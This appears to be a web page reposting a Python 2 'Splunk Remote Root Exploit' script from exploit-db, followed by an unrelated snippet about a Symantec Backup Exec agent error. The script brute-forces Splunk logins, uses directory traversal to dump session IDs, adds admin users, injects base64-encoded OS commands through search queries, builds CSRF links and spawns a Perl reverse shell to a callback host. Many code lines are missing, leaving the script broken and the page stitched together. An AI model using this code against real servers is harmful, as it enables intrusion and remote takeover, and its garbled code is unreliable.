Splunk Remote Root Exploit

简介:  http://www.exploit-db.com/exploits/18245/ from sec1httplib.


from sec1httplib.requestbuilder import Requestobj
from sec1httplib.thread_dispatcher import *
import threading
import re
import urlparse
import sys
import urllib
import base64
from optparse import OptionParser
import sys
Source: http://www.sec-1.com/blog/?p=233
Splunk remote root exploit.
Author: Gary O'leary-Steele @ Sec-1 Ltd
Date:   5th September 2011
Release date: Private
Full Package: http://www.exploit-db.com/sploits/18245.zip
C:\git\splunk>python splunk_exploit.py -h
Usage: Run splunk_exploit.py -h to see usage options
  --version          show program's version number and exit
  -h, --help         show this help message and exit
  -t TARGETHOST      IP Address or hostname of target splunk server
  -c                 Generate CSRF URL only
  -w SPLUNKWEB_PORT  The Splunk admin interface port (Default: 8000)
  -d SPLUNKD_PORT    The Splunkd Web API port (Default: 8089)
  -u USERFILE        File containing usernames for use in dictionary attack
  -p PASSFILE        File containing passwords for use in dictionary attack
  -U USERNAME        Admin username (if known)
  -P PASSWORD        Admin pasword (if known)
ToDo: Fix bug when attemping to get home dir
#Set this to use a proxy
Requestobj.verbose = 0
misc_lock = threading.Lock()
# Counter used in bruteforce
class Counter():
    def __init__(self):
        self.l = threading.Lock()
    def set_total(self,total):
        self.statictotal = total
        self.total = total
    def sub(self):
        with self.l:
            if self.total !=0:
                self.total = self.total - 1
    def print_remaining(self):
        with self.l:
            print "[i] %s of %s remaining" % (self.total,self.statictotal)
counter = Counter()
def request_factory_splunkd(targeturl,username,password,splunk_object):
    "Factory to generate attempt_login functions"
    global counter
    def attempt_login():
        # Dont continue if we already have admin
        if splunk_object.got_admin == 1:
            return False
        login_url = "{0}/services/auth/login".format(targeturl.rstrip())
        r = Requestobj(login_url)
        poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        if result.find_data("Remote login disabled because you are using a free license"):
            print "[i] Free licence in use. No remote login required"
            print "[!] run the exploit again with the -f flag"
        if result.find_data("sessionKey"):
            print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip())
                if splunk_object.user_is_admin(username.rstrip(),password.rstrip()):
                    splunk_object.username = username.rstrip()
                    splunk_object.password = password.rstrip()
                    splunk_object.got_admin =1
                    #print "ADMIN",splunk_object.got_admin
                    splunk_object.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0]
            except Exception as err:
                print "[i] Error getting auth details",err
            return (username,password)
    return attempt_login
def request_factory_splunkweb(targeturl,username,password,cval,splunk_object):
    "Factory to generate attempt_login functions"
    global counter
    def attempt_login():
        if splunk_object.got_admin == 1:
            return False
        login_url = "{0}/en-GB/account/login".format(targeturl.rstrip())
        r = Requestobj(login_url)
        poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,username.rstrip(),password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        if result.find_data("This resource can be found at"):
            print "[***] Cracked: %s:%s" % (username.rstrip(),password.rstrip())
                if splunk_object.user_is_admin(username.rstrip(),password.rstrip()):
                    splunk_object.username = username.rstrip()
                    splunk_object.password = password.rstrip()
                    splunk_object.got_admin =1
            except Exception as err:
                print "[i] Error getting auth details",err
            return (username,password)
    return attempt_login
class SplunkTarget(object):
    def __init__(self,hostaddr,splunkd_port=8089,splunkweb_port=8000):
        self.splunkd_port = splunkd_port
        self.splunkweb_port = splunkweb_port
        self.max_threads = 20
        self.password = ""
        self.session_key =""
        self.splunk_home = ""
        self.got_admin = 0
        self.web_authed = 0 # are we authed to the web interface
        self.freelic =0
        # Check splunkd server
        info = Requestobj("https://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest()
        if info.body:
            self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc)
            info = Requestobj("http://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest()
            self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc)
        if "server-info" in info.body:
            self.splunkd =1
                self.os_build = re.findall("os_build\">(.+?)<",info.body)[0]
                self.os_name = re.findall("os_name\">(.+?)<",info.body)[0]
                self.os_version = re.findall("os_version\">(.+?)<",info.body)[0]
                self.server_name = re.findall("serverName\">(.+?)<",info.body)[0]
                self.splunk_version = re.findall("\"version\">(.+?)<",info.body)[0]
                self.cpu_arch = re.findall("cpu_arch\">(.+?)<",info.body)[0]
                print "[i] Splunkd server found. Version:{0}".format(self.splunk_version)
                print "[i] OS:{0} {1} {2}".format(self.os_name,self.os_version,self.os_build)
            except Exception as err:
                print "Error getting splunk server info",err
            self.splunkd =0
        # Check splunk web
        splunkweb_info = Requestobj("http://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest()
        if splunkweb_info.body:
            self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc)
            splunkweb_info = Requestobj("https://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest()
            self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc)
        if "Splunk" in splunkweb_info.body:
            print "[i] Splunk web interface discovered"
            self.splunkweb =1
                self.cval = splunkweb_info.extract_data_body('name="cval" value="(\d+?)"')[0]
                print "[i] CVAL:{0}".format(self.cval)
                print "[i] Error getting cval"
                self.splunkweb =0
            self.splunkweb =0
        if self.splunkweb ==1:
                url ="{0}/en-GB/manager/system/licensing".format(self.splunkweb_url)
                lic = Requestobj(url).makerequest()
                if "<h1>Free license group</h1>" in lic.body:
                    print "[i] Configured with free licence. No auth required"
                    #if not self.splunkd:
                    #    print "[i] Cannot connect to splunkd using free licence"
                    #    sys.exit()
            except Exception as err:
                print "error",err
    def account_bruteforce(self,userfile,passfile):
        global counter
        q = ThreadDispatcher(store_return=1,max_threads=self.max_threads)
        for username in set(open(userfile).readlines()):
            for password in set(open(passfile).readlines()):
                if self.splunkd == 1:
                elif self.splunkweb==1:
                    print "[Error] Not connected"
        for x in range(q.return_queue._qsize()):
            username, password = q.return_queue.get(x)
            username = username.rstrip()
            password = password.rstrip()
            print "[***] Cracked: %s:%s" % (username,password)
    def user_is_admin(self,username,password):
        if self.splunkd == 1:
            # attempt to auth via splunkd to get a sessionkey
            self.username = username
            self.password = password
            url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url))
            context = url.makerequest()
            if '<title>httpauth-tokens' in context.body:
                self.got_admin =1
                return True
                return False
        elif self.splunkweb == 1:
            with misc_lock:
                self.username = username
                self.password = password
                if self.splunkweb_auth():
                    admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest()
                    if admin_only.find_data("Port that Splunk Web uses"):
                        print "[i] User:{0} IS AN ADMIN.".format(username)
                        return True
                        print "[i] User:{0} is not an admin".format(username)
            print "Not Connected"
            return False
    def search_payload_cmd(self,payload):
        "Generate a command execution payload"
        encoded = urllib.quote(base64.b64encode(payload))
        encodedpl = """search index=_internal source=*splunkd.log |mappy x=eval("sys.modules['os'].system(base64.b64decode('%s'))")""" % encoded
        #print encodedpl
        return encodedpl
    def get_splunk_home(self):
        if not self.username or not self.password:
            print "[i] Valid username and password required"
            r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url))
            splunkdir =  r.makerequest()
            if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd:
                self.splunk_home = splunkdir.body.strip()
                print "[***] Could not get home dir setting default.."
                if "windows" in self.os_name.lower():
                    self.splunk_home = "c:\\program files\\splunk"
                    self.splunk_home = "/opt/splunk"
                print "Setting Splunk home dir to:{0}".format(self.splunk_home)
            return self.splunk_home
        except Exception as err:
            print "[i] Error occured while attempting to read splunk home dir",err
    def splunkd_auth(self):
        login_url = "{0}/services/auth/login".format(self.splunkd_url)
        r = Requestobj(login_url)
        poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        if result.find_data("Remote login disabled because you are using a free license"):
            print "[i] Free licence in use. No remote login required"
            print "[!] run the exploit again with the -f flag"
        if result.find_data("sessionKey"):
            self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0]
            return True
            return False
    def splunkweb_auth(self):
        if self.web_authed == 1:
            return True
        login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie
        cval = login_page.extract_data_body('name="cval" value="(\d+?)"')
        if cval:
            cval = cval[0]
        r = Requestobj(login_page.url)
        poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        if result.find_data("This resource can be found at"):
            return True
            self.web_authed = 1
            print "[i] Login Failed"
    def add_admin(self,username,password,sessionKey):
        # look for 201
        if self.splunkd == 1 and self.username and self.password:
            url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url))
            url.add_header("authorization","Splunk {0}".format(sessionKey))
            result = url.makerequest()
            if str(result.code) == "201":
                return True
                return False
            print "[!] Not connected to splunkd. Check port and creds"
            return False
    def dump_session_ids(self):
        "Exploits dir traversal issue to dump session ids"
        print "[i] Attemping to dump sessions"
        if self.splunkd == 1 and self.username and self.password:
            #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))
            url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))
            result = url.makerequest()
            if "session=" in result.body:
                print "[i] Session ID's extracted from web_service.log"
                sessions = re.findall("session=(.+?)[<\s]",result.body)
            for session in set(sessions):
                print "[SESSION]",session
            return set(sessions)
    def perl_revshell(self,revhost,port):
        cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port)
    def search_exploit_cmd(self,command):
        "Execute commands via search exploit."
        if self.splunkweb == 1 and self.got_admin:
            if self.web_authed == 0:
            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            for c in shell_req.get_cookiejar():
                if "session" in c.name:
            x = shell_req.makerequest()
        elif self.splunkd == 1 and self.got_admin and self.session_key:
            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url))
            shell_req.add_header("authorization","Splunk {0}".format(self.session_key))
            x = shell_req.makerequest()
            print "Session",self.session_key
            print "Admin",self.got_admin
            print "Splunkd",self.splunkd
            print "[i] Exploit failed. Not connected or access denied"
    def blind_shell(self):
        while 1:
            print command.rstrip()
            if command.rstrip() == "exit": break
    def get_csrf_link_cmd(self,command):
        return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(command))
    def get_csrf_link_revshell(self,revhost,port):
        cmd="""perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (revhost,port)
        return "{0}/en-US/app/search/flashtimeline?q={1}&earliest=0".format(self.splunkweb_url,self.search_payload_cmd(cmd))
    def search_exploit_psudoshell(self):
        "Execute commands via search exploit. Payload implements a virtual shell"
        if not self.username or not self.password:
            print "[i] Valid username and password required"
        if not self.splunkweb == 1:
            print "[error] Managment Web Interface required for this payload"
            return ""
        if self.web_authed == 0:
        base_dir = self.get_splunk_home()
        #if not base_dir:
        #    print "Failed to get splunk basedir"
        #    base_dir = "/opt/splunk"
        while 1:
            print command.rstrip()
            if command.rstrip() == "exit": break
            if "windows" in self.os_name.lower():
                tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir)
                command = command + tmp #'"'+ tmp +'"'
                tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir)
                command = command + tmp
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            for c in psudoshell_req.get_cookiejar():
                if "session" in c.name:
            x = psudoshell_req.makerequest()
            import time
            print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body
    def pop_shell(self):
        "Prompt for paylod options"
        "[w00p] We appear to have access. Please select a payload"
        print "[Payload Options]"
        if self.splunkweb == 1:
            print "[1]\tPseudo Interactive Shell"
            print "[DISABLED]\tPseudo Interactive Shell"
        print "[2]\tPerl Reverse Shell"
        print "[3]\tCommand Exec (Blind)"
        option = input("Please select option 1-3:")
        if option == 1:
        elif option ==2:
            rev_host = raw_input("Enter Callback Host:")
            rev_port = raw_input("Enter Callback Port:")
        elif option ==3:
            print "Invalid option"
def main():
    banner = "-----==[Slunk Remote Root Exploit]=-----\n"
    parser = OptionParser(usage="Run %prog -h to see usage options",
                          version="%prog 1.0")
                      help="IP Address or hostname of target splunk server")
                      action="store_true", # optional because action defaults to "store"
                      help="Generate CSRF URL only")
                      action="store_true", # optional because action defaults to "store"
                      help="Target is configured to use a Free licence and does not permit remote auth")
                      action="store", # optional because action defaults to "store"
                      help="The Splunk admin interface port (Default: 8000)")
                      action="store", # optional because action defaults to "store"
                      help="The Splunkd Web API port (Default: 8089)")
                      action="store", # optional because action defaults to "store"
                      help="File containing usernames for use in dictionary attack")
                      action="store", # optional because action defaults to "store"
                      help="File containing passwords for use in dictionary attack")
                      action="store", # optional because action defaults to "store"
                      help="Admin username (if known)")
                      action="store", # optional because action defaults to "store"
                      help="Admin pasword (if known)")
                     action="store", # optional because action defaults to "store"
                     help="Attempt to add admin user via priv up directory traversal magic. Accepts username:password")
    (options, args) = parser.parse_args()
    if not options.targethost:
        parser.error("Target host required")
    elif options.targethost and options.free_lic_noauth:
        x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port)
        x.splunkd = 0
    elif options.targethost and options.csrf:
        x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port)
        print "[*] Enter command to run or enter 'revshell' for a perl reverse shell:"
        option = raw_input("cmd>")
        if option =="revshell":
            rev_host = raw_input("Enter Callback Host:")
            rev_port = raw_input("Enter Callback Port:")
            print x.get_csrf_link_revshell(rev_host,rev_port)
            print x.get_csrf_link_cmd(option.strip())
    elif options.targethost and options.username and options.password and options.userpair:
        print "[i] Attemping priv up"
        if ":" in options.userpair:
            username,password = options.userpair.split(":")
            print "-e requires username password pair in format username:password"
        x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port)
        x.username= options.username
        x.password = options.password
        x.splunkd = 1
        import time
        while 1:
            sessionids= x.dump_session_ids()
            for session in sessionids:
                if x.add_admin(username,password,session):
                    print "[i] User Added"
    elif options.targethost and options.username and options.password:
        print "[i] Using static username and password"
        x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port)
        x.username= options.username
        x.password = options.password
        if x.user_is_admin(options.username,options.password):
    elif options.targethost and options.userfile and options.passfile:
        print "[i] Lauching bruteforce attack"
        x = SplunkTarget(options.targethost,splunkweb_port=options.splunkweb_port,splunkd_port=options.splunkd_port)
        if x.got_admin ==1:
        print "Please ensure you have supplied either a username and password or a user and password file to bruteforce"
if __name__ == '__main__':


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Symantec Backup Exec Agent 推送错误Error connecting to the remote computer. Ensure that the computer is available, has WMI enabled and is not blocked by a
如果在Symantec Backup Server上推送Symantec Backup Exec Agent到数据库服务器遇到“"Error connecting to the remote computer. Ensure that the computer is available, has WMI enabled and is not blocked by a firewall"这个错误, 如下截图所示     那么完全可以参考下面官方提供的三个解决方案解决问题,几次碰到这个问题,每次都要搜索一下,特此记录一下,方便以后查找。
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JavaScript 开发工具 前端开发